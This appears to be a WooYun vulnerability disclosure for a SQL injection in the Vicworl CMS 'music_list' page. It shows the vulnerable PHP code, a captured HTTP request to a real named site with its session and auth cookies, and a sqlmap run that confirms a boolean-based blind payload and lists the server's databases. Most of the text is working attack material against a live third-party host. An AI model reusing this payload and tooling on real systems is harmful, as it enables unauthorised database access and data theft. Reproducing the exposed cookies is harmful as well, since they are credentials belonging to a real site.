WooYun.org

$magic_quotes_gpc = get_magic_quotes_gpc( );
@extract( @daddslashes( @$_COOKIE ) );
@extract( @daddslashes( @$_POST ) );
@extract( @daddslashes( @$_GET ) );
if ( $magic_quotes_gpc )
{
    $_FILES = daddslashes( $_FILES );
}

if ( empty( $step ) )
{
    $systypeId_cond = "";
    if ( empty( $systypeId ) )
    {
        $systypeId_cond = " and systypeId=".$systypeId." ";
    }
    $sql_query = "SELECT `id`\r\n\t\t\t, `name`\r\n\t\t\t, `systypeId`\r\n\t\t\t, `mytypeId`\r\n\t\t\t, `status`\r\n\t\t\t, `sys_status`\r\n\t\t\t, `sort`\r\n\t\t\t, `uid`\r\n\t\t\t, `count`\r\n\t\t\t, `type`\r\n\t\t\t, `content`\r\n\t\t\t, `tags`\r\n\t\t\t, `createtime` \r\n\t\t\t, `encoder` \r\n\t\t\t, `commend`\r\n\t\t\t,(SELECT `name` FROM `".$tablepre."syslogtype` WHERE id=a.systypeId)  as systypename\r\n\tFROM `{$tablepre}article` a\r\n\tWHERE `uid`='{$vicworl_uid}' \r\n\t\t   and `type`='{$type}' {$systypeId_cond} ORDER BY `createtime` DESC";
    $sql_count = "SELECT count(*) \r\n\t\t  FROM `".$tablepre."article`  \r\n\t\t  WHERE `uid`='{$vicworl_uid}' and `type`='{$type}' {$systypeId_cond}\r\n\t\t   \r\n\t\t  ";
    $page = new pdo_page( );
    $page_size = 10;
    $link_num = 10;
    $pagestr = "?action=music_list&systypeId=".$systypeId."&";
    $page->set( $db, $sql_query, $sql_count, $page_size, $link_num, $pagestr );
    $page->create_page( );
    $page_data = $page->get( 0 );
    $page_show = $page->get( 1 );
    if ( 0 < $page->get( 2 ) )
    {
        $i = 0;
        for ( ; $i < count( $page_data ); ++$i )
        {
            $page_data[$i]['createtime'] = date( $format_datetime, $page_data[$i]['createtime'] );
        }
    }
    $page_data = htmlsc( $page_data );
    $page_show( "page_show", @$page_show );
    $page_data( "allRows", @$page_data );
    $tpl->display( $theme."memcp/music_list.html" );
}

GET /memcp.php?action=music_list&systypeId=* HTTP/1.1
Host: ntzx.cn
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: VisitNum=2; _gscu_465476474=27948242hdqtdg95; DSSESSID=ufubjpa8ops1pnjkdmb6ud8c17; vicworl_auth=CO1Q7lmYrTo1wUVwf80CVokjwwarNj5AIO00eJ2EiTCHaAU95ASRHIFHseYM

G:\Hacker\sqlmap-master>sqlmap.py -r C:\Users\A\D
esktop\6.txt --risk 3 --dbms=MySQL --dbs --delay=2 --batch --hex
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150317}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:25:05
C:\Users\A\Desktop\6.txt
[13:25:05] [INFO] parsing HTTP request from 'C:\Users\A\Desktop\6.txt'
C:\Users\A\Desktop\6.txt
custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] Y
[13:25:05] [WARNING] it seems that you've provided empty parameter value(s) for
testing. Please, always use only valid parameter values so sqlmap could be able
to run properly
[13:25:05] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] Y
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://ntzx.cn:80/memcp.php?action=music_list&systypeId=-2737 OR 86
93=8693
---
[13:25:22] [INFO] testing MySQL
[13:25:24] [WARNING] reflective value(s) found and filtering out
[13:25:24] [INFO] confirming MySQL
[13:25:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[13:25:24] [INFO] fetching database names
[13:25:24] [INFO] fetching number of databases
[13:25:24] [INFO] resumed: 5
[13:25:24] [INFO] resumed: information_schema
[13:25:24] [INFO] resumed: mysql
[13:25:24] [INFO] resumed: test
[13:25:24] [INFO] resumed: vicworl
[13:25:24] [INFO] resumed: wordpress
available databases [5]:
[*] information_schema
[*] mysql
[*] test
[*] vicworl
[*] wordpress

Powered by Vicworl